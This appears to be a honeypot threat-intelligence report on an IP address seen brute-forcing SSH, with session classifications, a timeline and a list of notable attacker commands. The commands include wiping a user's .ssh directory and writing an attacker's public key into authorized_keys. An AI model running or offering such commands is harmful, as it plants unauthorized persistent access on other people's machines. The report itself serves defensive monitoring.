
45.61.52.18

Threat Confidence: 60%
Location: 🇺🇸 US / Los Angeles
ASN: AS36007 · Kamatera, Inc. (Cloud Provider)
Total Events: 374 (Top 10% by volume)
Agent Count: 2
First / Last Seen: 2026-03-31 22:34 — 2026-04-09 21:33
Attack Types: ssh:bruteforce
MITRE ATT&CK Techniques: Initial Access, Defense Evasion, Credential Access, Command and Control
External Corroboration: Not flagged by any external feeds
Session Forensics: malware_dropper ×14, credential_harvester ×29, opportunistic_bruter ×14
Sessions: 57 (28 with login)
Avg Depth Score: 0.55
Commands Executed: 42
Files Downloaded: 14
Notable Commands
  • cd ~; chattr -ia .ssh; lockr -ia .ssh
  • lockr -ia .ssh
  • cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~
Fingerprints
03a80b21afa810682a776a7d42e5e6fb
SSH-2.0-libssh_0.11.1
Evidence Timeline
Opportunistic Bruter 477edde95abe w4m_seattle_01 · 2026-04-10 20:39
1 50%
Malware Dropper f4e53303fc36 w4m_seattle_01 · 2026-04-10 20:39
3 1 1 100%
Credential Harvester ece373106c5a w4m_seattle_01 · 2026-04-10 20:39
1 35%
Credential Harvester b802d87bd069 w4m_singapore_01 · 2026-04-09 21:33
1 35%
Credential Harvester 3d1fd96c2887 w4m_singapore_01 · 2026-04-09 21:30
1 35%
Opportunistic Bruter 56e28c0e8c4c w4m_seattle_01 · 2026-04-08 08:29
1 50%
Malware Dropper 3b840c8b5dd6 w4m_seattle_01 · 2026-04-08 08:29
3 1 1 100%
Credential Harvester 458bbae48f64 w4m_seattle_01 · 2026-04-08 08:29
1 35%
Credential Harvester 5f0089ff0a6a w4m_seattle_01 · 2026-04-08 08:28
1 35%
Credential Harvester c71293f168fe w4m_seattle_01 · 2026-04-08 08:26
1 35%
Opportunistic Bruter d4ffdab3dd37 w4m_seattle_01 · 2026-04-08 08:25
1 50%
Malware Dropper 387d76c87401 w4m_seattle_01 · 2026-04-08 08:25
3 1 1 100%
Credential Harvester e8f0058949b4 w4m_seattle_01 · 2026-04-08 08:25
1 35%
Opportunistic Bruter 2c786f4d3e5f w4m_seattle_01 · 2026-04-08 08:23
1 50%
Malware Dropper 00c7837a4007 w4m_seattle_01 · 2026-04-08 08:23
3 1 1 100%
Credential Harvester 1e49e28cfa58 w4m_seattle_01 · 2026-04-08 08:23
1 35%
Credential Harvester 51859d4cf754 w4m_seattle_01 · 2026-04-08 08:21
1 35%
Credential Harvester ce2f040c5ba9 w4m_seattle_01 · 2026-04-08 08:20
1 35%
Opportunistic Bruter 1ac96085d49a w4m_seattle_01 · 2026-04-08 08:18
1 50%
Malware Dropper c6ea958ec1bf w4m_seattle_01 · 2026-04-08 08:18
3 1 1 100%
Credential Harvester 3f8fa79d9c56 w4m_seattle_01 · 2026-04-08 08:18
1 35%
Credential Harvester b87b3ae478ac w4m_seattle_01 · 2026-04-08 08:16
1 35%
Opportunistic Bruter 345780f0649e w4m_seattle_01 · 2026-04-08 08:15
1 50%
Malware Dropper c73fc52eace1 w4m_seattle_01 · 2026-04-08 08:15
3 1 1 100%
Credential Harvester ad2b57082f18 w4m_seattle_01 · 2026-04-08 08:15
1 35%
Opportunistic Bruter dea7d33b7182 w4m_seattle_01 · 2026-04-08 08:13
1 50%
Malware Dropper 9843a13a9bff w4m_seattle_01 · 2026-04-08 08:13
3 1 1 100%
Credential Harvester 9104b6d87ca6 w4m_seattle_01 · 2026-04-08 08:13
1 35%
Credential Harvester a3556e7be071 w4m_seattle_01 · 2026-04-08 08:12
1 35%
Opportunistic Bruter c0d5afc29263 w4m_seattle_01 · 2026-04-08 08:10
1 50%
Malware Dropper 1b469b36ac47 w4m_seattle_01 · 2026-04-08 08:10
3 1 1 100%
Credential Harvester 41ebe24ccf43 w4m_seattle_01 · 2026-04-08 08:10
1 35%
Credential Harvester 2469153b377b w4m_seattle_01 · 2026-04-08 08:09
1 35%
Credential Harvester 4bfea4ccd7f7 w4m_seattle_01 · 2026-04-08 08:07
1 35%
Opportunistic Bruter d0b11f7d5df0 w4m_seattle_01 · 2026-04-08 08:05
1 50%
Malware Dropper bf5bcd2aac91 w4m_seattle_01 · 2026-04-08 08:05
3 1 1 100%
Credential Harvester be8c9e53eefc w4m_seattle_01 · 2026-04-08 08:05
1 35%
Opportunistic Bruter 3b1debd9cc89 w4m_seattle_01 · 2026-04-08 08:04
1 50%
Malware Dropper 1631857e8e44 w4m_seattle_01 · 2026-04-08 08:04
3 1 1 100%
Credential Harvester 58cc6e093cd8 w4m_seattle_01 · 2026-04-08 08:04
1 35%
Opportunistic Bruter fdafa512214e w4m_seattle_01 · 2026-04-08 08:02
1 50%
Malware Dropper 45c7e3cac6a6 w4m_seattle_01 · 2026-04-08 08:02
3 1 1 100%
Credential Harvester e365bfffa7c3 w4m_seattle_01 · 2026-04-08 08:02
1 35%
Opportunistic Bruter 755ca26ca600 w4m_seattle_01 · 2026-04-08 08:01
1 50%
Malware Dropper 7cb727531f1b w4m_seattle_01 · 2026-04-08 08:00
3 1 1 100%
Credential Harvester 92337175230d w4m_seattle_01 · 2026-04-08 08:00
1 35%
Credential Harvester 16bb620127ef w4m_seattle_01 · 2026-04-08 07:59
1 35%
Opportunistic Bruter 04c6233ed4fd w4m_seattle_01 · 2026-04-08 07:57
1 50%
Malware Dropper f11dfe89ce9c w4m_seattle_01 · 2026-04-08 07:57
3 1 1 100%
Credential Harvester 5d67a71e1812 w4m_seattle_01 · 2026-04-08 07:57
1 35%